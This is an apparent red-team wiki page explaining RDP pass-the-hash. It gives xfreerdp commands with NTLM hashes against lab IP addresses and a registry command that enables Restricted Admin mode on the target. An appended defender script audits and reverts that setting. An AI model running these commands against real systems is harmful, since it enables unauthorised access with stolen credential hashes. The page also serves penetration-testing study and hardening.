RedTeamGarage (RTG)

RDP login with NTLM Hash


Last updated 11 months ago

Logging in over RDP with an NTLM hash is absolutely possible. Just keep in mind that the target's RDP port must be reachable from our Parrot attacking machine. If we have a valid NTLM hash for any user (mostly Admin), we can use that hash to log in over RDP with xfreerdp:

xfreerdp /u:admin /pth:2892d26cdf84d7a70e2eb3b9f05c425e /v:192.168.69.6 /cert-ignore

For the purposes of this example, enable RDP pass-the-hash on the target machine by setting DisableRestrictedAdmin to 0:

New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force

Then pass the hash over RDP to the target machine:

proxychains xfreerdp /v:172.16.X.194 /u:administrator /pth:f99529e42ee77dc4704c568ba9320a34 +compression +clipboard /dynamic-resolution +toggle-fullscreen /cert-ignore

Remote Desktop taken through NTLM Hash
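
A defender-side check for the registry setting shown above, as an added example that is not part of the original page: it reports whether DisableRestrictedAdmin has been explicitly set to 0 on the local host and can set it back to 1. The function names are hypothetical, and treating an absent value as "the OS default applies" is an assumption.

```powershell
# Added example (not from the original page): audit and harden the
# DisableRestrictedAdmin value that the page sets to 0 on the target.
$LsaPath   = 'HKLM:\System\CurrentControlSet\Control\Lsa'
$ValueName = 'DisableRestrictedAdmin'

function Get-RestrictedAdminState {
    # Hypothetical helper: read the value and classify it.
    $item = Get-ItemProperty -Path $LsaPath -Name $ValueName -ErrorAction SilentlyContinue
    if ($null -eq $item) {
        $raw   = $null
        $state = 'NotConfigured'   # assumption: value absent, OS default applies
    } else {
        $raw   = [int]$item.$ValueName
        # 0 is the setting the page applies to allow RDP pass-the-hash.
        $state = if ($raw -eq 0) { 'Enabled' } else { 'Disabled' }
    }
    [pscustomobject]@{
        ComputerName      = $env:COMPUTERNAME
        Value             = $raw
        State             = $state
        ExplicitlyEnabled = ($state -eq 'Enabled')
    }
}

function Disable-RestrictedAdmin {
    # Hypothetical helper: set the value to 1 only if it is currently 0.
    # Supports -WhatIf / -Confirm so the change can be previewed first.
    [CmdletBinding(SupportsShouldProcess = $true)]
    param()
    $before = Get-RestrictedAdminState
    if (-not $before.ExplicitlyEnabled) {
        return $before             # nothing to change
    }
    if ($PSCmdlet.ShouldProcess("$LsaPath\$ValueName", 'Set to 1')) {
        Set-ItemProperty -Path $LsaPath -Name $ValueName -Value 1 -Type DWord
    }
    Get-RestrictedAdminState       # report the state after the change
}

# Report the current state, then preview the fix without applying it.
Get-RestrictedAdminState | Format-List
Disable-RestrictedAdmin -WhatIf | Out-Null
```

Run it from an elevated PowerShell session; drop `-WhatIf` to apply the change.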